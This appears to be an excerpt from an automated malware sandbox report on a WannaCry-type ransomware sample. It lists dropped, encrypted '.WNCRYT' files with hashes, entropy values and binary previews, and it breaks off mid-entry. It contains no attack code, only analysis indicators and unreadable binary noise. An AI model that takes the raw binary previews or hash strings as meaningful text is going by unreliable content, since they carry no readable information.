1...G.....fE...o..,ROf'L.............dG...U.\;.d..T...`..u$...\.dF.W..^$...Lz..JU.....+L#..xh.1U..X.b..}T/:G.............8.?.......-..<........[...u.....9'...A.D.A..Z}^VF.g.KuW.....1...5[..Q..o........0..>..A....{$...t.,V8#.@......G.|....vH..7$...l.m,.l.tTzK..s...R.Z.r...,T.....6...sU.0..d.a....F5.;..r..$f.i.p..i.kk......s..Bv..d.k.Q..U.l...i...._......q.......M(.~VZ.1..dJ..T...B..V....H.........Huy,D.J#.t.S.....(~.SF$.|..K..>t.......k..u..A....G`''......._s.t.x..`.i3..1~.!/..|`=.`.......mb.c..~Y...3...s.O.[!.v./#.^..L.....s|.wa....S$.....~..OlP..2.=..)p.|'g..#..u.7..He.FD..C.....[g.Qp.U..;FK*..[.....\.Pj#&.3.1.6.`.0.d3...\^.$..pr6.1./F....F:....B..@.....t...s......._....QG...Z........q.._LK....'.....vn z"

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196552179353449.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
                                Entropy (8bit):7.998505761086846
                                Encrypted:true
                                SSDEEP:3072:ilxfDuGKHHCmdcKE6OcHs5UjS3fVpG7DQ:ilpmPE6Oom9eQ
                                MD5:402DF254DA4CE14676AF08C61D6415C3
                                SHA1:E3E7B1E1EA97863CA1AB10CE235D972102CFCDE1
                                SHA-256:0629B63C824DDEBE755E466D4D63063462E003FB4CFA870CA27ED07E09F8259E
                                SHA-512:B5654D9BDC62B6090BA4B7B4FEE45F2357D8428A52DF688D24F95F95DBDDC6EAF96A75B98D99598CF0DFECFAB5C1A1D6CF67C4EA56D22B974CB1EEDA70C100CF
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......G.u......u.&!..Z.2?.V.J...n.P...xbSJ.h.....n.G....~c....d..\....M.....z&...d.d....cY.:|f#]...*....StD.....|.".(P'N...3n..>.F.o.;....4L..(..dY...>...s.I..0.`/....`/.!/U:...|.}V..)....w...(Y._..`8@..M7........8...4...,S.4...,..u}...).....}.E....2{............0U.t)d.e..U...R.d.+....&.v..?....B8Y.......:.. ....`..{...i.ZNu.....& .J....De..H:6.E..z.1.$C....I?q.2s..M#ZF..E@...^X..7b...r....c...m.i.....L..M.....G..H.1j.d{u.o.....r...?.K#E........Y#.l...P..{../c.}.E.}.v.."j..s?..U.(.$..}V....y.)x.1.....m...m.a*..r..UY.`..z.?...V.}[A.g..0.g.T..@?.P...t.b.....R..+..uUI.79....D.y;..:}B.e.K.B... W...Q.|...0./.]..s..G(.T...b.!.6....#.alE....v#p.e..JF.K...}...J.St+...]._.[..fE6l.m.j$.....K +.. .x..|..l.h.|B$r..[....p.H2.ew.....~....8..#S....%.BGs8(Z..x........V.....&.....<K.`V..."b..p@..D<...."..f.S....V..z....;...q&!9.....H....#P9..).W......hh%.....~.i..7.X......m.`.{.H...PQ..V~..V6..@}.....#....]|dR;...Wd..s..M.....#.....wSoz.6"~.}J..

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196552479439416.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
                                Entropy (8bit):7.9985587459984195
                                Encrypted:true
                                SSDEEP:3072:l9HlK0QDmmWygJ6pOoLZVL2vOa9aoAScDc1ITlr7U:ldQim3gJ4LilanScUIlU
                                MD5:AA67DD611BE9603A12B8AA6770188F8E
                                SHA1:54A689B97312EB72A7FF43E8A9C924DE869E8E14
                                SHA-256:9CBCAC61524D42DE2314737F49EA148521A6885B29D463D8B5100C694D79EE5A
                                SHA-512:C784FCB02AE384F65AC42564436076FFDF896485D7C740E8408684CEA2F11D3B73C13C4A8951D3A24CD15DC2C288CCA2045A1CC0A578A36026E0CFBE6104830C
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......:.|v.q..r.n.UG....H. "....u.s..au..TPw.<S..Gb%..@..y...s$.59t..F.../....I......}M..;....+t#.E.........<7c...G.....NA.._...b.{!...TA.lM.@^.U..a+.W.m.........6^......m.o.M.p.Z..2`.B.....U....@fz+...,....BJe..ex..0.7.J.....4....b.m..R!f.:..O ............].e.....,'.Z...G..&.i...4......n.[.7OFMW.6...!WV...z3...$...,3.R.........&30....i...'...'...i.T..".u..#......`..'w.b;..V[....0.v.GM..j. e..8..v.U....#._...L.3\&.N,.8.....: .zd%..........|R....^&@.7u.shM...8..k.....7.........$..v._8.....6..3.....q.X=SDk...B3DM9Z...........e...;....K.)ZY.{AS....s.:/....3.7.....:.......'`n.t...:.....f..ieY.L.0:.n..=.2.:...:|w...@Z.4.9N{.5.,.g.Z$P....SM.\U.,.2..?..c....}R......G..{w../......%V.DJ...!.Z$=Qp.X......~.$........`.......r....xX;../.|...W..I....~......6KZ...-..+]..<%...&xs.7A.. .:...b.y.N.P{bX~$.. H.]...K..[p.z=.+.|.&.....w..jm.z...'......`P.d.2.N......?......pvF...&..v.X"].I.sF...G.gw$........Q.o..7]..k.n@./..0!a.L.`......F.p..

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196552779536724.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
                                Entropy (8bit):7.998372837712669
                                Encrypted:true
                                SSDEEP:3072:ZQaF1ufXWGbWRbUdMyp/WB1Uej89+bA4IqY1+6P:VKfG1RIGy4J8cbDMx
                                MD5:24A7F07AD15AF8C25BACE944A2BE380E
                                SHA1:3EBF6EBEF7EE01EB6E15A523F6B2A1F53E01405E
                                SHA-256:57486111BCA5E3D113F7B112DECBB1DC80A2FFD37D2565DAEB8D79DE1E0851C3
                                SHA-512:6B931E2AAEEBF864A4432CFE50FF37A83FB21825FA610E1F2D42A765127E806EB80AD33C430163D1C13EC09F3D4EABAE389692D3159810E7244825938ED594AA
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....7-...YE9.n.;..s;ml.....#...!...9N......a..P..s............c.M.1.&SS.<.SE{..s...z0.v.5..j*G.J.>;....L/.El.".Vn..g;V.K....CFyJi....>....L$...:.....j.'u7..+|ZGf....x.o..6'K...^..9..`3\.y..[.Rh.g..w.>....vC//_..i..{..Y..a.@*.&d...zr.%.3.....9/................^vl.C.@..O.90..F4.~x.<IF.e..:[?"..G5...D...7Y.4..*.,W.i..g..I.PTn...rcA.n..%T|.f......;.&]........r..E..Y..C.......-p.-XX.v.E..C...].{].6....yvl..}-b."D..u^P.t.(.t.w.u:(..}.Hr......H....v...?...|[....t....(./..>.OR..hk@...nY..-Q.g...K{..%....#.qA....O.......w..~....#t.2T.#.....z."...?...{. ...j0 ...[......O.....T.a(.k..TmL..(}....+.ka.i.0./..A<.#.?. ...w<P......g..3A.fI..`.x.....?n.@...B...r.\]Fz....7>..A...o.&.h..6.!..>...P.....TX%{N.?v...zO..Hs.Q_p..rQ.."{+.U..)Q.Q.[...#cw."U...5s..C.....k..J.._....FV....v.f.r6.r.. ....Z.:/=dw....s.j8X._0@...oy.vJB."...d..5..34]...U#...D..~..R..I....j....'R....q.....k.x.|.J.F.i6.V.G......}X...o[.....l.E.6N.....s.B........AQ:.0.!.Y.....1=.y}.F..

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):690472
                                Entropy (8bit):7.999754963596077
                                Encrypted:true
                                SSDEEP:12288:Xh1WaQ3nKUzE7VURHSt9onT/7BmE7+jt3Ng7qywf78sjcc/+/GhP+tPCSS:XfenKUsIyt2nT97oUWyo78EFGehP0PC5
                                MD5:C275AC12AAAD7F98FF27C16A300FE0A6
                                SHA1:6805ED86082F1D95E9738D2844C158E34627E411
                                SHA-256:B708D433FEFD3F67CA722D2E3A43EC61018F56EDD39EE87C6A8F47FAF41EF806
                                SHA-512:2776DCE703F2E5970860B77D4582F265E0612E55966964A24E25B6B846C85CEFEA783C1B2E79495D71EA1EA150DB26314A8C156CB8CC9796A8184611E1971E32
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......^1U.....d]...y.6w./.q....sn0.<7%..8.~.....7E..p..m.....x....Lx7T.+.I.m....fE....;..=.^...cF...._....O#K|z.`E2.....c....f..../......$U..C.#qFeL...!3-.D....s..A.&.h..^...b...H...u>.p...I>T.}.kU..u.>.=...T.g...........CF..2..)s(.....v...:?Z..z..K................!...?.t.....nT.h.....E....7.c...P...A........mj&...2t.Y..pZ.....n.....7.......6.... ........?/,.O:..|..x`...8..I.h........{...l{..m[................fq....J...X..1..].G.g....uQ..%..d..........a....fj...G....../.8.hB!.yS....#..P..}}<..~l%.7..3l....x.VX>.....j.Q....5U..!..&r...../...=G...:r....>}"[.5...'.Y2..I.d.zK....|~..z.....N...b;^.m/.'x..p...=(;...r2..3o,a..K.j.....g.@v......|.$V...p..|.Z.W.......9..&..gXt...~..~o.b<...5&8*.2....~YN7.....{.tx..$I.t.......`dUF^....C.mY.%.N.k.`...Y..m....6...M.ch..3.{.1.Bg.$....%......._. .2......>. .S4.A..+..".0.+...w[...n....6.....P....Psr._t3.K..*`..... .\M+...~..N.<>....(....n$.....'9k..*.8....Z..U..3./....V|.......0...%%

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\Flighting\FlightingLogging.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1816
                                Entropy (8bit):7.8893863653748175
                                Encrypted:false
                                SSDEEP:48:bktlYHHLjRAQ/MLBxrJ1QNjhHOXRXjYijF7LS1xg:o0HBAQ/kt1QFhHoXjHF7O1xg
                                MD5:C83752E071865B62A7F8404DE8BBCA3B
                                SHA1:D16ED73982690F257F09829728A14F697DEAEE71
                                SHA-256:05A89006B47105E4B1711863E6656FAF89E63B0C3B4D7CD5A50D4500C49C7CDC
                                SHA-512:909C7B293FCA8234FFAEF19AF9D80BC08D66AAF6944169DA61ACCC6C10DCAA957B97DBE64FF9DD7A22DA0CE93C757AD72D1AFD95409D70685502B15980D284E2
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....N...;.(b. mI....O..a....(GO.Fn..~.|......$C,..Nk.#....K.>..}O......K....p.........&.(}.t....:..x.5aI....5..<&......'...:.D.!.....I9.1_.....c..:..W......">F1hR..C.#....N.....N....~aT..7.$<....I.7Utz.0./.Z2Jp...j.f.Z....2.%..9..M&... .p.....................Fd.g.=g...}1.~y...,.P6._..NU("w]..C4....W..90~...\.....a.3.1....4.:4"...)......c[.*......sf.x....X<..iY.U.".M.>.....)...Tc\.....*.j....Q..xN....H..l......cY..l.Ch...j?;.P...#M3.(..YM...}.W.U.....3..............-....Y.9g..o...5.K\....&.b..lV......jHyW.F.4jIP3*....j.......p.>fI.}...dgS.....Ed..fM....\.J~...lQ.p...#m....j..G.=...A.?k..t.hc.U.e/k....)..H3..o...9.8..A..,.^.-:.>.2..F.m).{.d..g._,...G.-.$;.2u?.....}.Q..j/....0z.G.3....a....y|...6- 2...l....o.,L>F......1j.Pt..7./..OV...x9.e.R.....UYX........wv...bSpyA..T....R...{ 8dc8.b.E.L.b.^i"1..Y......Z..x<......4...s...B....O..<)[x8mV..'(.......%........v.lW\^..l_H..a...fcyW..g..&.6.EI....&..S.ffJKf../y?.....X.e...7J0.

                                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\LogFile_August_18_2021__5_27_51.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):568
                                Entropy (8bit):7.5835049068464615
                                Encrypted:false
                                SSDEEP:12:bkE5hQqpZT9W4QxPVP5Ul6EXtbThlIDqqhzrazLGC5tGpJEgYXfWxJg:bkuZJWHPclzXtOqqhzryGC5tGHJYXf2q
                                MD5:A69BD271E322C28034CCAC204E65CB61
                                SHA1:FD1FEFC6A1A39F7F34001341E6B40662F6AA77F4
                                SHA-256:D56830FFED823992C29450E1F34CFFAE778DD6572CB242A00A3437CD6C7F86A4
                                SHA-512:94C0B2F39EA9EEB80672DB9E7B33954D6E4F3EA0F748F25D8D40EE793995840F593674032E46FADC8C8046A6DA6E3B21EAEE9A72888F1F558E1E20D76DBD5F04
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........JD.YriB..s&&.X.q./&..1j....-...R...y...(........*..9....ov(....k'.+.............!/.D..`..3q.[B@.XQ......RA..c.bdyY"....m<?z.5...T.t.Cmk.XIu..Y.\x.0..oU.q.j.=y....5..WY|....a[@.|.?*4.s.Sl.~.G.<?.6@.....G....?3......{..w....3...\/.p.%.|d.?..ln.o!............Y..b..A#H.1.A.!!......(]p.l...;6g.1..v.dF!./..;JWR..i#..........k+blH....y...d.....|I..B..f..#..;oR..l....Z....L.n..r[.H..|g..V.Y.y_...."rUR....qU$dd....z]..V...jM..5..;..+.aTh...+.b..t....k9..*...Nv.L.ok.|.O.w......b.[\.\p!X...l..4....XU......~.>...f..$...0.X..T.L&%7.q.~.2.K..

                                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20210922101724.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):364408
                                Entropy (8bit):7.9995417060615415
                                Encrypted:true
                                SSDEEP:6144:U430UbuMaCLGPg5epCBtL4WHM+sKvdiJd3iJNWYdzn110gX0qMkdK14HgDICskHF:UM0w5m0tMWFsdD5YdDjj/M6KGHgDIkSc
                                MD5:E5E298F1AB7346CDC09D3621748E42CA
                                SHA1:71501D3B2885E78A2163384279C3D5C5FAD4B47E
                                SHA-256:869E9AB08BE9478D0568D8F8FB6F9098030F15FFAF224602FDD6D7B716743ED0
                                SHA-512:0A3F4088E8AF6AA2019E5A2C1FB0DBEB5EFD498804E203D5424984EC90FBEFB0F71BC6F0C550A7F757A442E6CC0278D4E041C1673F4BB0D1043487829DC7825C
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......L..%. S..!..E...u..*.t3...cL.~....9@^.._j.{LQ._..C~V..3.~...Xn..hS...+....v.(...X..3...c.u..4.z..~A4.&.p.n!.x`[.;Am...=.........hfgp.m~...F.....z....&SU..m.......T....3m.v....#q.dB.]vO.M.^k.].-J....s.P)....NN7B/.O....Tg%#....8\....s....n.0....X............. 7.#.-3.Tq.!)..*....5..W@TjC..f.~Cb..(O.,U.f....%e..T........f.@>..E...Q..:......C.M.J..wN....5-n........QC.3.k".}.-.:./j..5t.Tf5...,?)......B.N5..)..... 9{....P.7..0x.E.`.@.s3..{...z._x.....A).t/y..#. ..`......Y.~....B....h..;.P.f....D. Z$z..../.....HZ.p%....!..^..V<&......M.......lvjry.a..O...05..e.Z%.j_..L~.k...gyX.3W.$sFH.4B...;[0...+RKlh.P.9.~..m.......p.;+N..e]..)%......V.V.1.dvs`Qg.=>9....m|........ ;y.J...P.2.h...S...?QNUp..~- ..;.Q6.....$1..Q4...o...=.zo..q._.:......@.5qG..>][.~.Y..H..A9...Ek..1...2...H^......R".B......R...X.P.K.i..[MV....+..<..~..8....o*S...... ..Y...F....C.k\.:..7.o..{...7.r.S?`L$.z..s.tMz...".@Zt[.."..'<...l.....l...7..;......2........J@.S%aP...urrL:6.=g

                                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20210930121453.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):246312
                                Entropy (8bit):7.999330414347671
                                Encrypted:true
                                SSDEEP:6144:hosEl9iqIE6G+uAooZl/YqHcztbnMrzShN/ZfjWOdcrUQuOdc:BgrJgxV8VMrwbfCjrU6c
                                MD5:C9B509D139422FB08EBF8FB8E8A59E49
                                SHA1:71D8E3C59A2B5891AF0D3EC5003B2836F12924DA
                                SHA-256:825A5C935325026A40F948D6315B6C7892C4DA08E3EACBA94D14EC1F3B7BB14F
                                SHA-512:C8EA366C2549E6F4705537DC7E6244DC0F6614FC6FE464233A8C2DEB2D0467AFE2E5FD065548BEB55413BAC299548479A3F18BA99BFAFBCA0FA065065B34A329
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......f....].......@../%.B ....d..dR....kZ;u.s..l..u9.#x.q.pR...Vm....[..&Fh...Mj..|p.............m..O..O....yO.}.B.B.5.eA.....L...$&........`..".~.].Rz.s...>?>..(>l.RJ.K<.K8HQ...@q..lP/.d....R....y...*~.$....27~.^[.-.......N.....BZ.%..;.KP.g..^...w.\..kK............H.z..J1.......n...u......a...._.......B.%$........;.m.......8@...ni..Y..!...B...gL.C.....;..;.$\..x.|J.8 ....SQ .V-|...93'...W.Y2...n<.m..~f......3...5T..f'..W..5.Q[ c.C.j..d......g..Q.,.>A?......L4...y..>..X...#...@..r..{.t.A...j8...*_.W'..:6.IN..o"$Ju."..L..*.{...E.T.....(.."....b....E..}..Z..4...~+...Y.O.Q.k.N...0.0_ G.....R..t.(b_*7SI.8..n..].$....#...>:W~.....3]..K\W...|I..WZ......{.h..k..........z.h..}.U.%.h[O....Dk.o...9pc...A..pG.. &~.?...yQ[:.y.[.)...p.-...'...7j.^+?J....N....h..4.o...Z.E..+.4KB.O.....M.......b...F..o......./..8..v2f..R'...#p..........\....,...q.-...T..F.m.s...t.j..nA.W..K.yQ..v%d...=li.......S.{vq..5...f.a$..../..=@..ZA..?...Q....1zQe\...hX....!...

                                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220120085256.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):273704
                                Entropy (8bit):7.999288419867323
                                Encrypted:true
                                SSDEEP:6144:b3NuIFLpqwg/2zKyIc/Czuf7hZ9ieSv22oPvdZBSiN81uY3U5Se:boIpp74yCzujb9ile2oPv1Si+1uY3de
                                MD5:89E3520491ED4A58058B49AC3FCDC7B2
                                SHA1:E9597A0ECC49369F865E57CDBA9801D8749F7782
                                SHA-256:B79E102C31D31032115DA799E73EF2047C97088E341ED4AADA3E9D2400F02437
                                SHA-512:C219B4B24B23073728CB8E53DAAFDC078A13DD47692A92E7984BB7B7775AB027E537A1C4C207E120027A823E31430EF7465801A2687305F17D5DBC88FCCB36A5
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....vy];.1...sb.Q/i.Y..(.?.....0....N..KR.D6.I....@....*.-\.M.x.....k@..S.))M.H."..pm......m.....{1+..'Lc......g..qQ6h.hS....9..m.y.A.E...#T......./`hr..0c7.....gDJ..P..I+.l....q,DI.....M...w^ *.K&>.3.V8.....Y_............W.....J|..w.(._..tD......nJ.....,......$.......]F......wQ.1.Eg%Am...~Q+...?.)W...,n_..u.E..4R...xY.....<Js....J.~.Z.&..IbUE.._".Od.^..p.V.%...(,...E.......W=.,..A..9..=B...k.R.BY....;. &.).b.K(..<9..q$....F...(.,..2....1Q.v]y....D@...d..,...........&.K...==........7pS....g.c1....+..B....B.$Q..\.o...i.....a.)Z...6.b....I!{.99....Q..F8..j.G.UoVU..C.n.k.......X.9.F.R.K....Xvd.5.>.~Ul?...U.F...#....\m>d\...e...7..7@b....R....$..p..Y....a.n...:.....%.o.!..h .VY..t|D$S...V...C.B...My.....,.#...K....>.....|..P.[.......P`".2.M..UN.i._.s7C.|.g...A..5}....J....T{.....h!...9.1..1.!..gb.%c..s9"....t).`..../|.O...5.d.E..]..h.rX.L.~|O.o?`...e....9op.r.7..O.#Fk..42...i...!...5hQ...jZ[_.*E?.....h1{...x..fG`.....0.(O#M...7.W|8(#H

                                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220223140416.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):246824
                                Entropy (8bit):7.999227852254764
                                Encrypted:true
                                SSDEEP:6144:6k1CHEezLw42KVDPP1OsRLQDYYdggEVGSkR3gZsBq/n7sc5EHOr:6kGTXx0YLwYaEdkR3gSBWsc5rr
                                MD5:8876F29EAA76A41DD11ACD91D5BBBD15
                                SHA1:06050170100D27F6CCBC84CDE5E820E8D95554CE
                                SHA-256:74D9E3364080F41F16AA2157292FCF81AD2103585007976E311DB8200B6EF852
                                SHA-512:429A57C5FF4536B88A911FE901EBE8453D281387DC0310087611FC98E64061E71D919917D6225AD99C440D921D9670252015562DBCC6750464E53316CA6B8F08
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....mw.. .....wC*'..}...../....Z].W.a..6..8..i-..*..`^*.>X.4_..........7..,.xx....|2...*.s..w.U...G8...?...%0.)....@.R....4.n..0..f.....,m;D.A.((......&.!V.@.h.p.YR4.:.7X.14e..i...5..O.W..".PK..` . O!....@F.S..{..\e..C.x.FI...}...6.3q....S.....v....>..................0.Y.............Q'.5g.2<.m...o..uU..Tc.\Bl..F..3..s..y...).b?..;..haL./u.PT./.uBem...}k.d|....1n{cJ....H...cy/..U.G...RF[.e..M.....s..z..}...s_}...=.zS..1s?.?.....G.@.g.....*.G..L;|...BD...*.".}i.6..0.v.Z..._.............p......j.....A.I..!.9........_.;.=..K.z...mx.o.5.cKXm..s...%.....!Q-....<L."d.%......a.+.....N.R..Bd@X..=h..".W.Q....`P|;@.Q.......S3 .Z;x.J.!..Wo...!.#......g.(N..@...g.W.&!..\.......:Q6v..=..[.....e..F.....k.....q..SV..cu...y.!.....,.c....3..H,.~.....H....E2C 4W6...X.,f..j.C...n...Xr...#...S.o...U..c.>..5......c.}=....Y..ax%..)%G..8.>....XiQA..f..Cu[a..H.#.{i..k{.......q.M.~......{...(..B.......F..Z......b.a..e....C.%B..vWju.@..ux...D....... ..Y..:j...^.Z&.[;.

                                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20210922101725.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):55320
                                Entropy (8bit):7.996226975058619
                                Encrypted:true
                                SSDEEP:1536:G1VTwyqTRFRDR8H+6q0Ow6KE6ogc7zt1pg:qTpaDRP6Em
                                MD5:51F5DE08B5EBB5E6DD6C52DA3ECA307D
                                SHA1:0806875482B183B74D4556A36395F34F740F0ECB
                                SHA-256:BC9C6D9A51F2FE2B26B32A9D3872431AAD84ABB73EE44174CE1B994D86C3D409
                                SHA-512:30573A30C40FD5D88ADF277F0AA9F152CFA8A5FC5C4A0372F835A44864CE8BBC801EBB2DC98530D51983893E72E1F76FB1F96B66E0D11ACA58D84887A6DC7C23
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......xF.......4....).#.'\l.B..,$..N.\k.y+.O..m.Fe.{,...7.{..............iT.k0......s.k^.23j.m.u..A...iCj)?L..U..].{..@|...4.m.p.DOB..pb.jI4]W.z6....b..lm!Pj.W.)!.,|....Sz...<..7o...I..!..L..}|......i...P.L..A.n!g.C....8'.d:.~....l. t?....m#..R.X............j...A...>V..6.r(...].,t..Q)R_...q.y^B......rE.y..9.].*%:.\...].kx.......]..../..q^....d....g..r.K4..d...z......r..:\...|.Jy&..zw..g....L..hpS!.......r..3..r.OS{..(.}(k.n.u.....vS..;..f./Y..J"VuW*D..oVP....x.j..?..L........{l...v..sL.....z.w.X5&4\.2...u.;...]..~..xp.......A.(d......>...JaBc......."m.>....d..ZT...O.w..#."..._k....[...~.P.%I..>oh....I.*L...bL..G.....Xgc......4].0L?.w..89._a7/c2.....mI.............C..E..f@........AY.....>.b.Y.<./=IR.....I2E.:..^L8_.7pl...+.....&...W.`/.....L.6..?sQ........*L5ik...A.4...h..ZnO.d/VE0.. ...p...Z..z...#.L..~?...'...{Bi..... ..2:.TU|z..+R..m[I#...L.zE..K.d...B...3&....cb.Ho...6~.$.l.....|J....dX.=T.k.....3S...T>i\.<...t.....(...tB..

                                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20210930121453.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):25192
                                Entropy (8bit):7.99326540145318
                                Encrypted:true
                                SSDEEP:384:CX7YeDiWcwGE4wi8Vwd+HgqiHm96/effSu4O3MKrJjD9PU1HFF7U3+hYW4xSdXCT:CoTHIwd+H57uWMyJjK93hYNSc
                                MD5:EC5A11F934EE3C506E344FA2583FED61
                                SHA1:6A7996655731E65ECA60F370CE64221708093BD7
                                SHA-256:DB5CE90812B5020945503B09B98FE323300218A0E2A7C04BFBCEF4D137E62CC8
                                SHA-512:17CF7D87936170CB773E331A68A12F35AD4913D622629CB9A81B4C38AC8223D844A177AE61C9660B2B89AC3C5E2956B6CF3F921B4DE85A3B9A458777C9046ABB
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....C..\.s.=`..Hnu.v.z.1-....V...'.~x.....<5,~.l44..)...p..[.bs......R9..#a....s.,.....A.\...Q.."Q..O.......z.......1tgzaF..[........&..'S.B..o..>.mXnl.|o.O...5...1.6.,..y..O...^.C.#.......6..._.....K...(3.n...e...\.5.m'G.|nj.......1..ys......Ba......o5.q..cU.....7.#.s.J.-{j.....S1&...i...zM .J..v....1NK\\......>.01.Z....:...vsR.y..IO.......0A.r..).2.....c{..|....+X}uuP! ..G...:....t..@.F9a.W....E.w..s.'poh..[..=...0.=.....%..F.~x.Io.*<..)ObX)`........".....$.;).........+.W.......0.Mh!...]r..A:...>$..lGT..4..........e.2-.;%..l6.}8s.(..=H.B.........{..ov..w....]"....../L.X..+S'.mA.".w...P.*...e}N,GN.v&...'.R.>...g.}=.P.s#...\..T....}T.U..q.li...2..l.]x.j\...C......H.#.().L'.........%u.i....E.;...X>...d......Rv.I.:..m..x....1...4....:..1.....>......f.Z.Yd...Z{\..+I...#...Fl.}.(....<{o....=*_7.<5.D)...*F..(-.t.... .v......;\J3`;v.....`.l.H...I..i...4D.......3....p,....bT....-H*.T..u.&...>....j,.{.F..T.@...s.q8........<...

                                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20220223140416.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):25192
                                Entropy (8bit):7.991684795454581
                                Encrypted:true
                                SSDEEP:768:NVErtMNuWIjRHCFLuSi/ZLUardvUPVAYf98JTt:NVMtCHIguSixBB0CAy
                                MD5:F56B3EB69A0931ECFBB4A63944C06D16
                                SHA1:F40283F9E53C66A46F8BF3861B42985F8BF2F274
                                SHA-256:692C568DE560CBA2FBF386918D03482AB68F8BAA3517B38E0A6FE97A900ABE80
                                SHA-512:64BCFCFEBBD62DA4AA9B9217825D35391AFB82C03288399849537567BDA6C728293319495250A295C2A05F907BFDA1958CEA7AB8A3FC4C5D8F5DC639DB0D4E54
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....^A.<.W.8x.i.H..?.....d........p..S..:VF..H....hm:y...Gy.V$..+..F.{AD...j|e.t.IL.....Y~s.I"...M`.#...=.j...qG.......TC\.R.(..WxlQmG.T:.....*t.V...P.*....&."...Ab..6k...F.F.5...v.O.e}+.......\.(<P.0.j.1........3.P5-[.Z%.F..e.Q.tv.[.]..3.0K.Ax.;...j4.Q....Ba........l[..K..EpS..W.`..>.PJ{.|..n&._.>.!o.Z?......R..H...p.Q2.[.}..J.....%Q,X.........\..c....[..DB+OI.r/k..Mq......"....C..F...Os7&.{.j%(\...ljM.3.:8\lq.v..^..[...G.._k+y_.)-....T.U..v..4.Xw..\.|.t.....MW.....T....1\4.n.Q%C+.'=..0uRB>..k.u...q......W.E(.|....gM.D.E..Ka..../.mL..t}...T1*s..1}h.2......gk9S'..iV.....(Id..&..a=...p..Q..5F...}6F....?...............(_$.4.}..b..=.t.}CW"./.|N9..^.,.Z8K.q.b.f..6S.s...^....U.].../[......k$.f.\.-1....... [..R.W.^.......>..ap..L....u..<.r.Y..82a..G......I-..t..;m-4.mx!..K..R.:.A.;.7U.....Yc.d....*..Ra....<.....9...gx.4.C._.~.E.CEb2........B.O8V......w6G....9.G.5.%...l...m"...W.+r7.7.7...h.....<.....`...3.Q.......*..A.LA..mTH....J..aTr..).

                                C:\Users\user\AppData\Local\Temp\0.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
